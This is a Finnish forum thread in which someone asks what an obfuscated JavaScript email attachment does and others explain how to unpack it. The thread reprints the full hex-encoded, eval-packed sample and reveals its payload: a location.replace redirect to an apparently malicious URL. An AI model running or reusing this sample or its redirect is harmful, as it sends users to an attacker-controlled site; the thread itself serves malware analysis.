Sain oheisen JavaScript-haitakkeen sähköpostiin, ja ihan pervosta uteliaisuudesta kiinnostaisi ymmärtää, mitä se tekee. Se on kuitenkin sen verran kryptistä sotkua, etteivät omat taitoni siihen riitä – osaako täällä joku tulkata tuota? Tuo oli siis vielä hex-koodattuna, mutta pyöräytin sen ASCII:ksi.
var _$_a404=[N(m,c,h){N z(i){M(i<O?'':z(1g(i/O)))+((i=i%O)>1h?1i.1j(i+1k):i.1l(1m))}1n(P i=0;i<m.1o;i++)h[z(i)]=m[i];N d(w){M h[w]?h[w]:w};M c.1f(/\b\w+\b/g,d)}('P|1p|1r|1s|1t|1u|1v|1w|N|1x|1y|1z|1A|1d|1e|14|M|S|T|U|V|X|Y|Z|10|R|11|13|15|16|17|18|19|1a|1b|12||||Q|W|1B|1q|1C|1H|1D|1E|1F'.1G('|'),'0 1=[\'\\2\\3\\4\\5\\6\\7\\3\'];(8(A,B){0 C=8(9){a(--9){A[\'b\'](A[\'c\']());}};C(++B);}(1,d));0 e=8(A,B){A=A-f;0 C=1[A];g C;};0 h=[\'\\i\\j\\j\\4\\k\\l\\l\\j\\i\\6\\m\\n\\5\\o\\m\\n\\n\\2\\o\\p\\4\\q\\r\\7\\o\\s\\l\\t\\u\\v\\w\\x\\y\\z\\D\\v\\E\\F\\G\\E\\u\\H\\I\\r\\J\\i\\j\\s\\5\\r\\4\\i\\4\',e(\'f\')];K[h[L]](h[f]);',{}))|split||||||||||||||||||||||||||||||||||||||||||||||||return|function|62|var|x54|x75|_0x56fd60|x68|x74|x3a|x4e|x2f|x6e|x67|x6f|x73|x57|x2e|0x0|x6d|x5f|x49|x5a|x52|x47|x50|eval|0x107|_0x3737|replace|parseInt|35|String|fromCharCode|29|toString|36|for|length|_0x2465|x36|x72|x65|x70|x6c|x61|x63|_0x42d372|while|push|shift|x58|x33|x78|location|0x1|split|x4d fromCharCode, "toString", "replace", "\w+", "\b", "g"];eval(function(_0x22539,_0x223A4,_0x223F5,_0x224E8,_0x22497,_0x22446){_0x22497= function(_0x223F5){return (_0x223F5< _0x223A4?_$_a404[4]:_0x22497(parseInt(_0x223F5/ _0x223A4)))+ ((_0x223F5= _0x223F5% _0x223A4)> 35?String[_$_a404[5]](_0x223F5+ 29):_0x223F5[_$_a404[6]](36))};if(!_$_a404[4][_$_a404[7]](/^/,String)){while(_0x223F5--){_0x22446[_0x22497(_0x223F5)]= _0x224E8[_0x223F5]|| _0x22497(_0x223F5)};_0x224E8= [function(_0x22497){return _0x22446[_0x22497]}];_0x22497= function(){return _$_a404[8]};_0x223F5= 1};while(_0x223F5--){if(_0x224E8[_0x223F5]){_0x22539= _0x22539[_$_a404[7]]( new RegExp(_$_a404[9]+ _0x22497(_0x223F5)+ _$_a404[9],_$_a404[10]),_0x224E8[_0x223F5])}};return _0x22539}(_$_a404[0],62,106,_$_a404[3][_$_a404[2]](_$_a404[1]),0,{}))
Oletko varma, että muunsit sen oikein ASCII:ksi? Tuohan ei ole syntaktisesti oikeaa JavaScriptiä, vaan luulen, että siihen pitää tehdä joitakin muunnoksia, ennen kuin se voidaan ajaa.
Kohdasta `('P|1p|1r...` alkaen tuossa näyttäisi olevan jonkinlainen muunnostaulu, sillä koodissa on paljon 1:llä alkavia saneita, jotka pitäisi muuntaa toisiksi. Esim. `1G`:n pitäisi varmaankin olla `split`. Koodista näyttäisi kuitenkin puuttuvan se osa, joka tekee muunnoksen (tai koodi on muunnettu jotenkin väärin). `eval(function(...`-kohdan jälkeen koodi näyttää validilta.
Terve!
En todellakaan ole varma muunnoksesta, sen verran oksennusta se oli. Laitan koodin uudelleen sellaisena kuin se alkuperäisenä tuli liitetiedostossa.
var _$_a404=["\x31\x63\x28\x4E\x28\x6D\x2C\x63\x2C\x68\x29\x7B\x4E\x20\x7A\x28\x69\x29\x7B\x4D\x28\x69\x3C\x4F\x3F\x27\x27\x3A\x7A\x28\x31\x67\x28\x69\x2F\x4F\x29\x29\x29\x2B\x28\x28\x69\x3D\x69\x25\x4F\x29\x3E\x31\x68\x3F\x31\x69\x2E\x31\x6A\x28\x69\x2B\x31\x6B\x29\x3A\x69\x2E\x31\x6C\x28\x31\x6D\x29\x29\x7D\x31\x6E\x28\x50\x20\x69\x3D\x30\x3B\x69\x3C\x6D\x2E\x31\x6F\x3B\x69\x2B\x2B\x29\x68\x5B\x7A\x28\x69\x29\x5D\x3D\x6D\x5B\x69\x5D\x3B\x4E\x20\x64\x28\x77\x29\x7B\x4D\x20\x68\x5B\x77\x5D\x3F\x68\x5B\x77\x5D\x3A\x77\x7D\x3B\x4D\x20\x63\x2E\x31\x66\x28\x2F\x5C\x62\x5C\x77\x2B\x5C\x62\x2F\x67\x2C\x64\x29\x7D\x28\x27\x50\x7C\x31\x70\x7C\x31\x72\x7C\x31\x73\x7C\x31\x74\x7C\x31\x75\x7C\x31\x76\x7C\x31\x77\x7C\x4E\x7C\x31\x78\x7C\x31\x79\x7C\x31\x7A\x7C\x31\x41\x7C\x31\x64\x7C\x31\x65\x7C\x31\x34\x7C\x4D\x7C\x53\x7C\x54\x7C\x55\x7C\x56\x7C\x58\x7C\x59\x7C\x5A\x7C\x31\x30\x7C\x52\x7C\x31\x31\x7C\x31\x33\x7C\x31\x35\x7C\x31\x36\x7C\x31\x37\x7C\x31\x38\x7C\x31\x39\x7C\x31\x61\x7C\x31\x62\x7C\x31\x32\x7C\x7C\x7C\x7C\x51\x7C\x57\x7C\x31\x42\x7C\x31\x71\x7C\x31\x43\x7C\x31\x48\x7C\x31\x44\x7C\x31\x45\x7C\x31\x46\x27\x2E\x31\x47\x28\x27\x7C\x27\x29\x2C\x27\x30\x20\x31\x3D\x5B\x5C\x27\x5C\x5C\x32\x5C\x5C\x33\x5C\x5C\x34\x5C\x5C\x35\x5C\x5C\x36\x5C\x5C\x37\x5C\x5C\x33\x5C\x27\x5D\x3B\x28\x38\x28\x41\x2C\x42\x29\x7B\x30\x20\x43\x3D\x38\x28\x39\x29\x7B\x61\x28\x2D\x2D\x39\x29\x7B\x41\x5B\x5C\x27\x62\x5C\x27\x5D\x28\x41\x5B\x5C\x27\x63\x5C\x27\x5D\x28\x29\x29\x3B\x7D\x7D\x3B\x43\x28\x2B\x2B\x42\x29\x3B\x7D\x28\x31\x2C\x64\x29\x29\x3B\x30\x20\x65\x3D\x38\x28\x41\x2C\x42\x29\x7B\x41\x3D\x41\x2D\x66\x3B\x30\x20\x43\x3D\x31\x5B\x41\x5D\x3B\x67\x20\x43\x3B\x7D\x3B\x30\x20\x68\x3D\x5B\x5C\x27\x5C\x5C\x69\x5C\x5C\x6A\x5C\x5C\x6A\x5C\x5C\x34\x5C\x5C\x6B\x5C\x5C\x6C\x5C\x5C\x6C\x5C\x5C\x6A\x5C\x5C\x69\x5C\x5C\x36\x5C\x5C\x6D\x5C\x5C\x6E\x5C\x5C\x35\x5C\x5C\x6F\x5C\x5C\x6D\x5C\x5C\x6E\x5C\x5C\x6E\x5C\x5C\x32\x5C\x5C\x6F\x5C\x5C\x70\x5C\x5C\x34\x5C\x5C\x71\x5C\x5C\x72\x5C\x5C\x37\x5C\x5C\x6F\x
5C\x5C\x73\x5C\x5C\x6C\x5C\x5C\x74\x5C\x5C\x75\x5C\x5C\x76\x5C\x5C\x77\x5C\x5C\x78\x5C\x5C\x79\x5C\x5C\x7A\x5C\x5C\x44\x5C\x5C\x76\x5C\x5C\x45\x5C\x5C\x46\x5C\x5C\x47\x5C\x5C\x45\x5C\x5C\x75\x5C\x5C\x48\x5C\x5C\x49\x5C\x5C\x72\x5C\x5C\x4A\x5C\x5C\x69\x5C\x5C\x6A\x5C\x5C\x73\x5C\x5C\x35\x5C\x5C\x72\x5C\x5C\x34\x5C\x5C\x69\x5C\x5C\x34\x5C\x27\x2C\x65\x28\x5C\x27\x66\x5C\x27\x29\x5D\x3B\x4B\x5B\x68\x5B\x4C\x5D\x5D\x28\x68\x5B\x66\x5D\x29\x3B\x27\x2C\x7B\x7D\x29\x29","\x7C","\x73\x70\x6C\x69\x74","\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x72\x65\x74\x75\x72\x6E\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x36\x32\x7C\x76\x61\x72\x7C\x78\x35\x34\x7C\x78\x37\x35\x7C\x5F\x30\x78\x35\x36\x66\x64\x36\x30\x7C\x78\x36\x38\x7C\x78\x37\x34\x7C\x78\x33\x61\x7C\x78\x34\x65\x7C\x78\x32\x66\x7C\x78\x36\x65\x7C\x78\x36\x37\x7C\x78\x36\x66\x7C\x78\x37\x33\x7C\x78\x35\x37\x7C\x78\x32\x65\x7C\x30\x78\x30\x7C\x78\x36\x64\x7C\x78\x35\x66\x7C\x78\x34\x39\x7C\x78\x35\x61\x7C\x78\x35\x32\x7C\x78\x34\x37\x7C\x78\x35\x30\x7C\x65\x76\x61\x6C\x7C\x30\x78\x31\x30\x37\x7C\x5F\x30\x78\x33\x37\x33\x37\x7C\x72\x65\x70\x6C\x61\x63\x65\x7C\x70\x61\x72\x73\x65\x49\x6E\x74\x7C\x33\x35\x7C\x53\x74\x72\x69\x6E\x67\x7C\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65\x7C\x32\x39\x7C\x74\x6F\x53\x74\x72\x69\x6E\x67\x7C\x33\x36\x7C\x66\x6F\x72\x7C\x6C\x65\x6E\x67\x74\x68\x7C\x5F\x30\x78\x32\x34\x36\x35\x7C\x78\x33\x36\x7C\x78\x37\x32\x7C\x78\x36\x35\x7C\x78\x37\x30\x7C\x78\x36\x63\x7C\x78\x36\x31\x7C\x78\x36\x33\x7C\x5F\x30\x78\x34\x32\x64\x33\x37\x32\x7C\x77\x68\x69\x6C\x65\x7C\x70\x75\x73\x68\x7C\x73\x68\x69\x66\x74\x7C\x78\x35\x38\x7C\x78\x33\x33\x7C\x78\x37\x38\x7C\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x7C\x30\x78\x31\x7C\x73\x70\x6C\x69\x74\x7C\x78\x34\x64","","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x74\x6F\x53\x74\x72\x69\x6E\x67","\x72\x65\x70\x6C\x61\
x63\x65","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function(_0x22539,_0x223A4,_0x223F5,_0x224E8,_0x22497,_0x22446){_0x22497= function(_0x223F5){return (_0x223F5< _0x223A4?_$_a404[4]:_0x22497(parseInt(_0x223F5/ _0x223A4)))+ ((_0x223F5= _0x223F5% _0x223A4)> 35?String[_$_a404[5]](_0x223F5+ 29):_0x223F5[_$_a404[6]](36))};if(!_$_a404[4][_$_a404[7]](/^/,String)){while(_0x223F5--){_0x22446[_0x22497(_0x223F5)]= _0x224E8[_0x223F5]|| _0x22497(_0x223F5)};_0x224E8= [function(_0x22497){return _0x22446[_0x22497]}];_0x22497= function(){return _$_a404[8]};_0x223F5= 1};while(_0x223F5--){if(_0x224E8[_0x223F5]){_0x22539= _0x22539[_$_a404[7]]( new RegExp(_$_a404[9]+ _0x22497(_0x223F5)+ _$_a404[9],_$_a404[10]),_0x224E8[_0x223F5])}};return _0x22539}(_$_a404[0],62,106,_$_a404[3][_$_a404[2]](_$_a404[1]),0,{}))
Selkokielellä antamasi koodi on yksinkertaisuudessaan seuraavanlainen:
// Deobfuscated payload of the sample quoted above: after the two eval/packer
// layers are unwrapped, the only action left is a redirect of the current
// window to this URL. location.replace() swaps the current history entry
// instead of pushing a new one, so the back button does not return the
// victim to the page they came from.
location.replace('http://thanglonggroups.com/_IZRGPWTZNX6NI3M.xhtml.php');
Koodi siis pyrkii ainoastaan uudelleenohjaamaan käyttäjän osoitteeseen http://thanglonggroups.com/_IZRGPWTZNX6NI3M.xhtml.php.
Aika olennainen ero ensimmäisen ja jälkimmäisen koodisi välillä on se, että jälkimmäinen sisältää 11 erillistä lainausmerkeissä olevaa tekstiä, kun taas ensimmäisestä olet jättänyt lainausmerkit pois. Onhan "N()" aivan eri asia kuin N().
Koodin merkitys selviää vaiheittain, kun eval-kutsun tilalle vaihdetaan console.log tai alert (mieluiten eristetyssä ympäristössä, jossa sivulle ei päädy vahingossa): tuloksena on vielä toinen kerros samanlaista kikkailua, ja kolmannesta kerroksesta paljastuu koodi, jonka lopussa asetetaan osoite.
Kiitoksia, nyt pääsin kärryille itsekin; oli tuo kyllä melkoista oksennusta.